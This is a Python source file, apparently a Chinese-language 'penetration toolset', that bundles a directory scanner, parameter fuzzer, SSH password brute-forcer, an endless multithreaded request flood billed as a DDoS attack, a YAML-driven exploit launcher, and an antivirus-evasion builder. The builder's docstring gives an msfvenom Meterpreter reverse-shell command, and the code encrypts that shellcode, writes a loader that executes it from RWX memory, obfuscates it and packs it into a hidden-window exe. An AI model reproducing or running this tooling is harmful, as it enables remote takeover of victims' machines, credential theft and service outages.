|
|
from multiprocessing import Queue
|
|
|
import os
|
|
|
import subprocess
|
|
|
import random
|
|
|
import threading
|
|
|
import concurrent.futures
|
|
|
import time
|
|
|
import base64
|
|
|
import ctypes
|
|
|
import socket
|
|
|
import hashlib
|
|
|
import paramiko
|
|
|
from itertools import cycle
|
|
|
from Crypto.Cipher import AES
|
|
|
from typing import Any
|
|
|
|
|
|
try:
|
|
|
import yaml
|
|
|
except:
|
|
|
print("yaml库不存在,正在安装...")
|
|
|
os.system('pip install pyyaml')
|
|
|
import yaml
|
|
|
try:
|
|
|
import fire
|
|
|
except ImportError:
|
|
|
print("fire库不存在,正在安装...")
|
|
|
os.system("pip install fire")
|
|
|
try:
|
|
|
import requests
|
|
|
except ImportError:
|
|
|
print("requests库不存在,正在安装...")
|
|
|
os.system("pip install requests")
|
|
|
|
|
|
|
|
|
class PingTool:
|
|
|
"""
|
|
|
基于 subprocess 的 ping 命令或基于 TCP 的 ping 命令
|
|
|
|
|
|
Args:
|
|
|
-u : ping 的目标
|
|
|
-t : ping 的类型(icmp 或 tcp)
|
|
|
-p : TCP ping 的端口
|
|
|
python penetration_toolset.py PingTool -u 127.0.0.1 -t icmp
|
|
|
python penetration_toolset.py PingTool -u 127.0.0.1 -t tcp -p 80
|
|
|
"""
|
|
|
|
|
|
def __call__(self, url="", t="icmp", p=0):
|
|
|
self.url = url
|
|
|
self.ping_type = t
|
|
|
self.port = p
|
|
|
self.ping()
|
|
|
|
|
|
def ping(self):
|
|
|
try:
|
|
|
if self.ping_type.lower() == "icmp":
|
|
|
result = subprocess.run(['ping', self.url], capture_output=True, text=True)
|
|
|
print(result.stdout)
|
|
|
elif self.ping_type.lower() == "tcp":
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
|
s.settimeout(5) # 设置连接超时时间为5秒
|
|
|
if self.port == 0:
|
|
|
self.port = 80 # 设置默认端口号为80,或者抛出异常提示用户设置端口号
|
|
|
try:
|
|
|
s.connect((self.url, self.port))
|
|
|
print(f"{self.url}:{self.port} is reachable.")
|
|
|
except (socket.error, socket.timeout) as e:
|
|
|
print(f"{self.url}:{self.port} is unreachable.")
|
|
|
finally:
|
|
|
s.close()
|
|
|
else:
|
|
|
print("Unsupported ping type. Please use 'icmp' or 'tcp'.")
|
|
|
except Exception as e:
|
|
|
print(f"An error occurred: {e}")
|
|
|
|
|
|
|
|
|
class searchpath():
|
|
|
"""
|
|
|
这是一个目录扫描命令
|
|
|
参数:
|
|
|
-u :url
|
|
|
指定扫描的ur1地址
|
|
|
-c :code
|
|
|
以列表方式指定所要选择的状态码,默认所有状态码
|
|
|
-d :dictionary
|
|
|
指定扫描使用的字典,默认为dict.txt字典
|
|
|
-r :report
|
|
|
指定保存的文件名,默认为url.txt
|
|
|
python penetration_toolset.py searchpath -u www.baidu.com
|
|
|
"""
|
|
|
def __call__(self, url, code=[x for x in range(200, 600)], dictionary='dict.txt', report='./report/report.txt'):
|
|
|
# url地址检测
|
|
|
self.url = url
|
|
|
if url:
|
|
|
res = requests.get(self.url_check(url))
|
|
|
if res.status_code != 200:
|
|
|
print("url地址填写失败!")
|
|
|
return
|
|
|
else:
|
|
|
self.url = self.url_check(url)
|
|
|
else:
|
|
|
self.url = None
|
|
|
#初始化默认值
|
|
|
self.dictionary = "./dict/" + dictionary
|
|
|
self.report = report
|
|
|
if self.report == "./report/report.txt":
|
|
|
if self.url[5] == 'http':
|
|
|
self.report = "./report/" + self.url[7:] + ".txt"
|
|
|
else:
|
|
|
self.report = "./report/" + self.url[8:] + ".txt"
|
|
|
else:
|
|
|
self.report = report
|
|
|
self.code = code
|
|
|
self.stitch(self.url_check(url))
|
|
|
|
|
|
#url检测
|
|
|
def url_check(self, url):
|
|
|
url = self.url
|
|
|
if url[:5] == 'https' or url[:5] == 'http:':
|
|
|
return url
|
|
|
else:
|
|
|
return "http://" + url
|
|
|
|
|
|
#文件保存
|
|
|
def writeurl(self, result):
|
|
|
try:
|
|
|
with open(self.report, 'a', encoding="UTF-8") as fp:
|
|
|
fp.write(result + '\n')
|
|
|
except FileNotFoundError:
|
|
|
print(self.report + "文件不存在!")
|
|
|
except IOError:
|
|
|
print(self.report + "文件读取错误!")
|
|
|
except Exception as e:
|
|
|
print(self.report + "其他异常:", str(e))
|
|
|
|
|
|
# 目录遍历
|
|
|
def stitch(self, url):
|
|
|
url = self.url
|
|
|
try:
|
|
|
with open(self.dictionary, 'r') as file:
|
|
|
for line in file:
|
|
|
final_url = url + "/" + line.strip()
|
|
|
res = requests.get(final_url)
|
|
|
if res.status_code in self.code:
|
|
|
print("[-]{:<30} 的状态码为:{:<200}".format(final_url, str(res.status_code)))
|
|
|
# print("[-]"+final_url+"的状态码为:"+str(res.status_code))
|
|
|
result = "[-]" + final_url + "的状态码为:" + str(res.status_code)
|
|
|
self.writeurl(result)
|
|
|
print("[*]" + self.dictionary[7:] + "的结果已保存至: " + self.report[8:])
|
|
|
except FileNotFoundError:
|
|
|
print(self.dictionary + "文件不存在!")
|
|
|
except IOError:
|
|
|
print(self.dictionary + "文件读取错误!")
|
|
|
except Exception as e:
|
|
|
print(self.dictionary + "其他异常:", str(e))
|
|
|
|
|
|
class encryption():
|
|
|
"""
|
|
|
该代码用于进一步混淆代码通过免杀
|
|
|
前期准备样例:
|
|
|
-生成shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw
|
|
|
-base64操作: base64 -w 0 -i rev.raw > rev.bs64
|
|
|
-获取payload: 即加密后字符串
|
|
|
-参数:
|
|
|
-p: payload:经过msfvenom生成的shellcode的base64加密字符
|
|
|
example:
|
|
|
python penetration_toolset.py encryption --payload='aaaapayload123'
|
|
|
'"""
|
|
|
|
|
|
def __call__(self, payload):
|
|
|
|
|
|
self.payload = payload
|
|
|
with open('./aes-xor.txt', 'w') as f:
|
|
|
f.write(self.aes_jiami(self.xor_jiami(self.payload, 35)))
|
|
|
|
|
|
# jiami_sc = self.aes_jiami(self.xor_jiami(self.payload,35))
|
|
|
# sc = self.xor_jiemi(self.aes_jiemi(jiami_sc),35)
|
|
|
# shde = base64.b64decode(sc)
|
|
|
# self.run(shde)
|
|
|
|
|
|
self.shell_write(self.aes_jiami(self.xor_jiami(self.payload, 35)))
|
|
|
self.min_code()
|
|
|
self.xor_code()
|
|
|
self.exe_file()
|
|
|
|
|
|
def add_to_16(self, s):
|
|
|
while len(s) % 16 != 0:
|
|
|
s += '\0'
|
|
|
return str.encode(s) # 返回bytes
|
|
|
|
|
|
def aes_jiami(self, text):
|
|
|
# 密钥长度必须为16、24或32位,分别对应AES-128、AES-192和AES-256
|
|
|
key = 'LeslieCheungKwok'
|
|
|
aes = AES.new(self.add_to_16(key), AES.MODE_ECB)
|
|
|
encrypted_text = str(base64.encodebytes(aes.encrypt(self.add_to_16(text))), encoding='utf8').replace('\n', '')
|
|
|
return encrypted_text
|
|
|
|
|
|
def xor_jiami(self, s, key):
|
|
|
xor_s = ''
|
|
|
for i in s:
|
|
|
xor_s += chr(ord(i) ^ key)
|
|
|
return xor_s
|
|
|
|
|
|
#shellcode生成
|
|
|
def shell_write(self, payload):
|
|
|
payload = self.payload
|
|
|
|
|
|
str_payload = '''
|
|
|
import base64
|
|
|
import ctypes
|
|
|
|
|
|
from Crypto.Cipher import AES
|
|
|
|
|
|
kernel32 = ctypes.windll.kernel32
|
|
|
|
|
|
def aes_jiemi(s):
|
|
|
cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
|
|
|
return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\\0').decode('utf8')
|
|
|
|
|
|
def xor_jiemi(s,key):
|
|
|
xor_s = ''
|
|
|
for i in s:
|
|
|
xor_s += chr(ord(i) ^ key)
|
|
|
return xor_s
|
|
|
|
|
|
def write_memory(buf):
|
|
|
length = len(buf)
|
|
|
|
|
|
kernel32.VirtualAlloc.restype = ctypes.c_void_p
|
|
|
ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)
|
|
|
|
|
|
kernel32.RtlMoveMemory.argtypes = (
|
|
|
ctypes.c_void_p,
|
|
|
ctypes.c_void_p,
|
|
|
ctypes.c_size_t)
|
|
|
kernel32.RtlMoveMemory(ptr, buf, length)
|
|
|
return ptr
|
|
|
|
|
|
|
|
|
def run(shellcode):
|
|
|
buf = ctypes.create_string_buffer(shellcode)
|
|
|
ptr = write_memory(buf)
|
|
|
shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
|
|
|
shell_func()
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == '__main__':
|
|
|
jiami_sc = '{}'
|
|
|
sc = xor_jiemi(aes_jiemi(jiami_sc),35)
|
|
|
shde = base64.b64decode(sc)
|
|
|
run(shde)
|
|
|
'''.format(payload)
|
|
|
|
|
|
with open('main_one.py', 'w', encoding='utf-8') as file:
|
|
|
file.write(str_payload)
|
|
|
|
|
|
#缩小python代码
|
|
|
def min_code(self):
|
|
|
print("[-] 正在缩小代码....")
|
|
|
time.sleep(1)
|
|
|
try:
|
|
|
os.system("pyminify main_one.py --output main-mini.py")
|
|
|
except:
|
|
|
print("[-] 该库不存在,正在安装....")
|
|
|
os.system("pip install python-minifier")
|
|
|
print("[-] 安装成功,正在执行缩小....")
|
|
|
try:
|
|
|
os.system("pyminify main_one.py --output main-mini.py")
|
|
|
#移动文件到“源目录”文件夹下
|
|
|
os.replace("main-mini.py", ".\源文件\main-mini.py")
|
|
|
except:
|
|
|
print("[-] 缩小失败,请检查代码")
|
|
|
|
|
|
# 对main_one.py进行混淆加密
|
|
|
def xor_code(self):
|
|
|
try:
|
|
|
if os.path.exists("Intensio-Obfuscator"):
|
|
|
print("[-] Intensio-Obfuscator工具库存在,正在检测依赖....")
|
|
|
if os.system(" pip install -r Intensio-Obfuscator/requirements.txt") == 0:
|
|
|
print("[-] 依赖安装成功,正在执行混淆加密....")
|
|
|
os.system(
|
|
|
"python .\Intensio-Obfuscator\src\intensio_obfuscator\intensio_obfuscator.py -i .\源目录\ -o main_result -mlen lower -rts -ps -rth -ind 2")
|
|
|
print("[-] 结果已保存到:main_result文件夹下")
|
|
|
print("[-] 正在删除过程文件....")
|
|
|
time.sleep(1)
|
|
|
os.remove("main_one.py")
|
|
|
os.remove("main-mini.py")
|
|
|
os.remove("aes-xor.txt")
|
|
|
print("[-] 过程文件删除成功")
|
|
|
|
|
|
else:
|
|
|
print("[-] 依赖安装失败,请检查网络")
|
|
|
return
|
|
|
except:
|
|
|
print("[-] Intensio-Obfuscator工具库不存在,正在安装....")
|
|
|
try:
|
|
|
os.system("git clone https://github.com/Hnfull/Intensio-Obfuscator.git")
|
|
|
except:
|
|
|
print("[-] git clone失败,请检查网络")
|
|
|
return
|
|
|
|
|
|
# 对main_one_obf.py进行打包为exe文件
|
|
|
def exe_file(self):
|
|
|
print("[-] 正在生成exe文件....")
|
|
|
time.sleep(1)
|
|
|
try:
|
|
|
os.system("copy ./main_result/main-mini.py ./main_resultone.py")
|
|
|
os.system(" pyinstaller.exe -Fw -i ./setting.ico main_resultone.py")
|
|
|
|
|
|
except:
|
|
|
os.system("pip install pyinstaller")
|
|
|
print("[-] pyinstaller安装成功,正在执行打包....")
|
|
|
os.system("copy ./main_result/main-mini.py ./main_resultone.py")
|
|
|
os.system(" pyinstaller.exe -Fw -i ./setting.ico main_resultone.py")
|
|
|
# print("[-] 已删除main_one_obf.py")
|
|
|
# os.remove("main_one_obf.py")
|
|
|
# os.remove(".\main_result.py")
|
|
|
os.remove(".\main_resultone.py")
|
|
|
print("[-] 打包成功,请查看dist文件夹")
|
|
|
|
|
|
class SSHBruteForce:
|
|
|
"""
|
|
|
SSH Brute Force Attack
|
|
|
-U: 主机
|
|
|
-u: 用户名字典
|
|
|
-p: 密码字典
|
|
|
-P: SSH端口(默认22)
|
|
|
|
|
|
example:
|
|
|
python penetration_toolset.py SSHBruteForce -U 127.0.0.1 -P 22 -u <用户名字典路径> -p <密码字典路径>
|
|
|
ps 第一个是大写的U,第二个参数是大写的P,可不写
|
|
|
"""
|
|
|
def __call__(self, U_host, username_dict, password_dict, Port=22):
|
|
|
self.U_host = U_host
|
|
|
self.port = Port
|
|
|
self.username_dict = username_dict
|
|
|
self.password_dict = password_dict
|
|
|
self.ssh_attack()
|
|
|
|
|
|
def ssh_attack(self):
|
|
|
with open(self.username_dict, 'r') as users:
|
|
|
usernames = [line.strip() for line in users]
|
|
|
|
|
|
with open(self.password_dict, 'r') as passwords:
|
|
|
passwords = [line.strip() for line in passwords]
|
|
|
|
|
|
for username in usernames:
|
|
|
for password in passwords:
|
|
|
try:
|
|
|
ssh = paramiko.SSHClient()
|
|
|
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
|
ssh.connect(self.U_host, self.port, username, password)
|
|
|
print(f'Successful SSH connection to {self.U_host}:{self.port} with credentials {username}:{password}')
|
|
|
ssh.close()
|
|
|
except paramiko.AuthenticationException:
|
|
|
print(f'Failed to authenticate to {self.U_host}:{self.port} with credentials {username}:{password}')
|
|
|
except paramiko.SSHException as e:
|
|
|
print(f'SSH error on {self.U_host}:{self.port}: {str(e)}')
|
|
|
except socket.error as e:
|
|
|
print(f'Socket error on {self.U_host}:{self.port}: {str(e)}')
|
|
|
|
|
|
class DDOSAttack:
|
|
|
"""
|
|
|
基础的DDOS攻击脚本
|
|
|
-u : 指定url
|
|
|
-n : 线程数
|
|
|
-p : IP代理池,格式为IP1,IP2,IP3
|
|
|
|
|
|
example:
|
|
|
python penetration_toolset.py DDOSAttack -u http://127.0.0.1 -n 3 -p "192.168.1.1,192.168.1.2,192.168.1.3"
|
|
|
"""
|
|
|
def __call__(self, url, num_threads, proxy_pool):
|
|
|
self.url = url
|
|
|
self.num_threads = num_threads
|
|
|
self.proxy_pool = proxy_pool.split(',') if proxy_pool else None
|
|
|
self.proxy_pool_iter = cycle(self.proxy_pool) if self.proxy_pool else None
|
|
|
self.attack()
|
|
|
|
|
|
def attack(self):
|
|
|
print(f"发起DDOS攻击,目标:{self.url},线程数:{self.num_threads}")
|
|
|
self.start_attack()
|
|
|
|
|
|
def start_attack(self):
|
|
|
def send_request():
|
|
|
proxies = {'http': next(self.proxy_pool_iter)} if self.proxy_pool else None
|
|
|
|
|
|
while True:
|
|
|
try:
|
|
|
requests.get(self.url, proxies=proxies)
|
|
|
except Exception as e:
|
|
|
print(f"An error occurred: {e}")
|
|
|
|
|
|
threads = []
|
|
|
for _ in range(self.num_threads):
|
|
|
t = threading.Thread(target=send_request)
|
|
|
threads.append(t)
|
|
|
t.start()
|
|
|
|
|
|
for t in threads:
|
|
|
t.join()
|
|
|
|
|
|
|
|
|
class Para_test():
|
|
|
"""
|
|
|
网站参数测试工具(get)
|
|
|
-u 指定url
|
|
|
-d 指定字典文件路径
|
|
|
example:
|
|
|
python penetration_toolset.py Para_test -u http://www.baidu.com -d ./param.txt
|
|
|
|
|
|
"""
|
|
|
|
|
|
def __call__(self, url, dictionary_path):
|
|
|
self.url = self.validate_url(url)
|
|
|
self.dictionary_path = dictionary_path
|
|
|
self.test_params()
|
|
|
|
|
|
@staticmethod
|
|
|
def validate_url(url):
|
|
|
"""确保URL具有有效的协议头"""
|
|
|
if not url.startswith(("http://", "https://")):
|
|
|
url = "http://" + url
|
|
|
return url
|
|
|
|
|
|
@staticmethod
|
|
|
def generate_content_hash(content):
|
|
|
"""生成页面内容的哈希值,用于比较内容变化"""
|
|
|
return hashlib.sha256(content.encode('utf-8')).hexdigest()
|
|
|
|
|
|
def test_params(self):
|
|
|
"""测试一组从文件读取的参数来猜测网站接受的参数"""
|
|
|
tested_params = {}
|
|
|
original_response = requests.get(self.url)
|
|
|
original_hash = self.generate_content_hash(original_response.text)
|
|
|
|
|
|
with open(self.dictionary_path, 'r', encoding='utf-8') as file:
|
|
|
for line in file:
|
|
|
param = line.strip()
|
|
|
test_url = f"{self.url}?{param}=testvalue"
|
|
|
response = requests.get(test_url)
|
|
|
response_hash = self.generate_content_hash(response.text)
|
|
|
|
|
|
if response_hash != original_hash:
|
|
|
tested_params[param] = "有效"
|
|
|
else:
|
|
|
tested_params[param] = "无效"
|
|
|
|
|
|
run_once = True
|
|
|
num = 0
|
|
|
for i in tested_params:
|
|
|
if tested_params[i] == "有效":
|
|
|
print(f"参数: {i}, 结果: {tested_params[i]}")
|
|
|
if run_once:
|
|
|
num = 1
|
|
|
run_once = False
|
|
|
|
|
|
if num == 0:
|
|
|
print("未发现有效参数")
|
|
|
|
|
|
class exploit(yaml.YAMLObject):
|
|
|
"""
|
|
|
用于定向的漏洞利用,获取shell等操作,具有可拓展型,支持yaml配置文件编写poc进行定向攻击测试。
|
|
|
参数:
|
|
|
-p:poc
|
|
|
指定使用的yaml文件
|
|
|
example:
|
|
|
python penetration_toolset.py exploit -p /test.yml -u 192.168.6.4
|
|
|
"""
|
|
|
data = {}
|
|
|
|
|
|
def __call__(self, poc, url, cmd=''):
|
|
|
self.poc = poc
|
|
|
self.url = url
|
|
|
self.cmd = cmd
|
|
|
if url:
|
|
|
res = requests.get(self.url_check(url))
|
|
|
if res.status_code != 200:
|
|
|
print("url地址填写失败!")
|
|
|
return
|
|
|
else:
|
|
|
self.url = self.url_check(url)
|
|
|
else:
|
|
|
self.url = None
|
|
|
self.attack()
|
|
|
|
|
|
def url_check(self, url):
|
|
|
url = self.url
|
|
|
if url[:5] == 'https' or url[:5] == 'http:':
|
|
|
return url
|
|
|
else:
|
|
|
return "http://" + url
|
|
|
|
|
|
def check_file(self, file_path: str):
|
|
|
if not os.path.isfile(file_path):
|
|
|
return 0
|
|
|
|
|
|
def read_file(self, poc):
|
|
|
file_path = os.getcwd() + "\poc\\" + self.poc
|
|
|
if self.check_file(file_path) == 0:
|
|
|
print("该文件", file_path, "不存在")
|
|
|
else:
|
|
|
with open(file_path, "r", encoding="utf-8") as fp:
|
|
|
self.data = yaml.load(fp, Loader=yaml.FullLoader)
|
|
|
|
|
|
def attack(self):
|
|
|
url = self.url
|
|
|
self.read_file(self.poc)
|
|
|
data = self.data
|
|
|
param_url = data.get('poc_url')
|
|
|
param_Agent = data.get('User-Agent')
|
|
|
param_method = data.get('method')
|
|
|
param_cmd = data.get('cmd')
|
|
|
cmd = self.cmd
|
|
|
# print(param_url[0]['url'])
|
|
|
# print(param_Agent)
|
|
|
# print(param_method)
|
|
|
# print(os.getcwd()+"/poc/"+self.poc)
|
|
|
# print(param_method[1]['data'])
|
|
|
print("正在攻击...")
|
|
|
method = param_method[0]['method']
|
|
|
if method == 'GET':
|
|
|
res = requests.get(url=str(url) + param_url[0]["url"], headers=param_Agent[0])
|
|
|
if res.status_code != 200:
|
|
|
result = res.text
|
|
|
print(result)
|
|
|
else:
|
|
|
print("返回内容错误,状态码为:" + str(res.status_code))
|
|
|
elif method == 'POST':
|
|
|
if param_cmd[0]['cmd'] == 'yes':
|
|
|
string_with_format = str(param_method[1]['data']) % cmd
|
|
|
res = requests.post(url=str(url) + param_url[0]["url"], data=string_with_format, headers=param_Agent[0])
|
|
|
if res.status_code == 200:
|
|
|
result = res.text
|
|
|
print(result)
|
|
|
else:
|
|
|
print("返回内容错误,状态码为:" + str(res.status_code))
|
|
|
else:
|
|
|
print("cmd参数错误或不存在")
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
fire.Fire() |